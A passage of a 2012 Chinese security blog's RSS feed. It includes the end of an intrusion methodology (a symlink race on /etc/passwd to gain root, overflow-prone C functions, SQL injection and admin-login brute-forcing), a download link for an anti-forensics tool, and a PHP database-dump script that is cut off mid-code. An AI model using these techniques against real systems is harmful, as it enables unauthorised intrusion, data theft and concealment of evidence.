pen之后，chown之前删了test.log，而创建了一个到/etc/passwd的符号链接，这样&lt;br /&gt;
就会将/etc/passwd文件的属主改为当前的用户，当前的用户就可以在passwd文件中&lt;br /&gt;
将自己的uid改为0，这样就取得了system权限。&lt;/p&gt;
&lt;p&gt;3，溢出和格式串漏洞&lt;/p&gt;
&lt;p&gt;导致这些漏洞的数据来源主要是：&lt;/p&gt;
&lt;p&gt;1，命令行参数&lt;/p&gt;
&lt;p&gt;2，环境变量&lt;/p&gt;
&lt;p&gt;3，特定格式文件的读取&lt;/p&gt;
&lt;p&gt;4，用户交互十的输入&lt;/p&gt;
&lt;p&gt;缓冲溢出的漏洞是有以下一些函数引起的：&lt;/p&gt;
&lt;p&gt;1，strcpy&lt;/p&gt;
&lt;p&gt;2, strcat&lt;/p&gt;
&lt;p&gt;3, sprintf&lt;/p&gt;
&lt;p&gt;4, vsprintf&lt;/p&gt;
&lt;p&gt;格式化串的漏洞和以下一些函数有关：&lt;/p&gt;
&lt;p&gt;1, print/vprintf&lt;/p&gt;
&lt;p&gt;2, fprintf/vfprintf&lt;/p&gt;
&lt;p&gt;3, sprintf/vsprintf&lt;/p&gt;
&lt;p&gt;4, snprintf/vsnprintf&lt;/p&gt;
&lt;p&gt;利用工具有objdump,elfedump查看目标是否有不安全的以上不安全的函数，如果有&lt;br /&gt;
可以进行黑盒测试，进而进行返汇编分析程序的上下文和执行流程，利用strings可&lt;br /&gt;
以静态查找目标的环境变量。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;六，攻击WWW&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;现在的入侵事件，攻击WWW居多，原因也很简单，那就是程序员在编写WEB脚本程序&lt;br /&gt;
时更本不注重安全因素，导致了上传shell,提升权限之类的严重后果，入侵渗透测&lt;br /&gt;
试主要通过以下几个方面进行测试：&lt;/p&gt;
&lt;p&gt;1，搜索SQL注入点；&lt;/p&gt;
&lt;p&gt;2，搜索特定目录和文件，例如：上传程序文件，这个利用价值也很大；&lt;/p&gt;
&lt;p&gt;3，寻找管理员登陆网页，进行字典或者SQL饶过入侵；&lt;/p&gt;
&lt;p&gt;4，寻找WEB程序的源代码，进行漏洞挖掘，主要涉及的漏洞类型有：SQL注入，文件&lt;br /&gt;
包含漏洞，目录跳转漏洞，以脚本文件格式保存错误日志漏洞，上传漏洞；&lt;/p&gt;
&lt;p&gt;5，在代码审核时，不要忘记对程序员犯的逻辑错误进行查看，例如：函数书写错误&lt;/p&gt;
&lt;p&gt;6，总是，漏洞的成因归根到底是由于对用户的输入没有进行严格的过滤。&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/608155111/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>下面的文章对于网络渗透,提供了一些很好的思路. 一，踩点 踩点可以了解目标主机和网络的一些基本的安全信息，主要有； 1，管理员联系信息，电话号，传真号； 2，IP地址范围； 3，DNS服务器； 4，邮件服务器。 相关搜索方法： 1，搜索网页。 确定目标信息1，为以后发动字典和木马入侵做准备；寻找网页源代码找注释和 隐藏域，寻找隐藏域中的”FORM”标记。例如： 可以发起SQL注入攻击，为以后入侵数据库做准备。 相关工具：UNIX下的Wget,Windows下的Teleport。 2，链接搜索 目标网站所在的服务器可能有其他具有弱点的网站，可以进行迂回入侵，而且可 以发现某些隐含的信息。 搜索方法介绍： 通过各种搜索引擎：GOOGLE，http://www.dogpile.comhttp://www.hotbot.com 二，查点 A，确定目标的域名和相关的网络信息。 搜索方法； Whois查询，通过Whois数据库查询可以得到以下的信息： 1，注册机构：显示相关的注册信息和相关的Whois服务器； 2，机构本身：显示与某个特定机构相关的所有信息； 3，域名：显示与某个特定域名相关的所有信息 4，网络：显示与某个特定网络或单个IP地址相关的所有信息； 5，联系点:显示与某位特定人员相关的所有信息 搜索引擎站：http://www.infobear.com/whois.shtml 举例：Output of: whois 163.com@whois.internic.net Registrant: Netease.com, Inc. 36/F Peace World Plaza, No.362-366 Huan Shi Dong Road Guangzhou, Guangdong 510060 CN Domain Name: 163.COM Administrative Contact, Technical Contact: [...]&lt;img src=&quot;http://www1.feedsky.com/t1/608155111/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>社工</category><category>网络渗透</category><category>安全相关</category><pubDate>Tue, 21 Feb 2012 10:43:32 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4081</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/608155111/6370047</fs:itemid></item><item><title>BackBox Linux 2.01 发布</title><link>http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp</link><content:encoded>&lt;p&gt;&lt;img src=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/backbox.jpg&quot; alt=&quot;&quot; title=&quot;backbox&quot; width=&quot;433&quot; height=&quot;325&quot; class=&quot;aligncenter size-full wp-image-4078&quot; /&gt;&lt;/p&gt;
&lt;p&gt;BackBox是基于Ubuntu的发行，它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境，而这得益于它自己的软件仓库，该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。&lt;/p&gt;
&lt;p&gt;Pro-actively protect your IT infrastructure with BackBox. It is the perfect security solution; providing pen-testing, incident response, computer forensics, and intelligence gathering tools. The most current release of BackBox Linux includes the latest software solutions for vulnerability analysis/assessment and pen-testing. It is one of the lightest/fastest Linux distros available on the Internet.&lt;/p&gt;
&lt;p&gt;它的基础设施,及时保护你BackBox。它具有完善的安全解决方案,提供pen-testing,事件反应,计算机取证和收集情报的工具。最新释放BackBox Linux包括最新的软件解决方案和pen-testing脆弱性分析/评估。这是一个最distros Linux /最快可以在因特网上获得。&lt;/p&gt;
&lt;p&gt;下载：&lt;a href=&quot;http://www.backbox.org/downloads&quot; title=&quot;backbox linux下载&quot; target=&quot;_blank&quot;&gt;http://www.backbox.org/downloads&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/608155112/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>BackBox是基于Ubuntu的发行，它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境，而这得益于它自己的软件仓库，该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。 Pro-actively protect your IT infrastructure with BackBox. It is the perfect security solution; providing pen-testing, incident response, computer forensics, and intelligence gathering tools. The most current release of BackBox Linux includes the latest software solutions for vulnerability analysis/assessment and pen-testing. It is one of the lightest/fastest Linux distros available on the Internet. 它的基础设施,及时保护你BackBox。它具有完善的安全解决方案,提供pen-testing,事件反应,计算机取证和收集情报的工具。最新释放BackBox Linux包括最新的软件解决方案和pen-testing脆弱性分析/评估。这是一个最distros [...]&lt;img src=&quot;http://www1.feedsky.com/t1/608155112/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>Linux</category><category>BackBox Linux</category><pubDate>Tue, 21 Feb 2012 10:34:30 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4077</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_21/4077/backbox-linux-201-release.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/608155112/6370047</fs:itemid></item><item><title>一款不错的反取证工具</title><link>http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp</link><content:encoded>&lt;p&gt;&lt;img class=&quot;aligncenter size-full wp-image-4074&quot; title=&quot;WYWZ&quot; src=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/WYWZ.jpg&quot; alt=&quot;&quot; width=&quot;627&quot; height=&quot;426&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;反取证工具&quot; href=&quot;http://115.com/file/c2msp634#&quot; target=&quot;_blank&quot;&gt;http://115.com/file/c2msp634#&lt;/a&gt;&lt;br /&gt;
反取证工具.rar&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/608155113/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>http://115.com/file/c2msp634# 反取证工具.rar&lt;img src=&quot;http://www1.feedsky.com/t1/608155113/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>取证工具</category><category>安全相关</category><category>反取证工具</category><category>安全工具</category><pubDate>Tue, 21 Feb 2012 10:20:09 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4073</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_21/4073/good-anti-forensics-tools.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/608155113/6370047</fs:itemid></item><item><title>php+MySQL程序SQL语句备份数据库</title><link>http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp</link><content:encoded>&lt;p&gt;&lt;strong&gt;说明：&lt;/strong&gt;使用fopen()函数，不需要select into outfile，所以不需file_priv为Y。填写好数据库，保存为xx.php访问一下即可&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;程序代码：&lt;/strong&gt;&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p40702&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4070code2&quot;&gt;&lt;pre class=&quot;php&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//blackbap.org&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_servername&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;localhost&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//数据库服务器&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_username&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//数据库登陆账户&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_password&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;pass&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//数据库登陆密码&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_database&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;dataname&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//数据库名称&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_link&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=@&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_connect&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_servername&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$mysql_username&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$mysql_password&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;mysql_select_db&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$mysql_database&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;mysql_query&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;SET NAMES gbk&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$mysql&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$q1&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_query&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;show tables&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #b1b100;&quot;&gt;while&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$t&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_fetch_array&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$q1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$table&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$t&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$q2&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_query&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;show create table `&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$table&lt;/span&gt;`&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$sql&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_fetch_array&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$q2&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$mysql&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$sql&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'Create Table'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$q3&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_query&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;select * from `&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$table&lt;/span&gt;`&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
  &lt;span style=&quot;color: #b1b100;&quot;&gt;while&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mysql_fetch_assoc&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$q3&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
    &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;array_keys&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;array_map&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'addslashes'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;join&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'`,`'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;    
    &lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;`&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$keys&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;`&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;array_values&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;array_map&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'addslashes'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;join&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;','&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;'&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$vals&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;'&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$mysql&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;insert into `&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$table&lt;/span&gt;`(&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$keys&lt;/span&gt;) values(&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$vals&lt;/span&gt;);&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
  &lt;span style=&quot;color: #000088;&quot;&gt;$mysql&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$filename&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;date&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'Ymj'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;.sql&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;fopen&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$filename&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'w'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
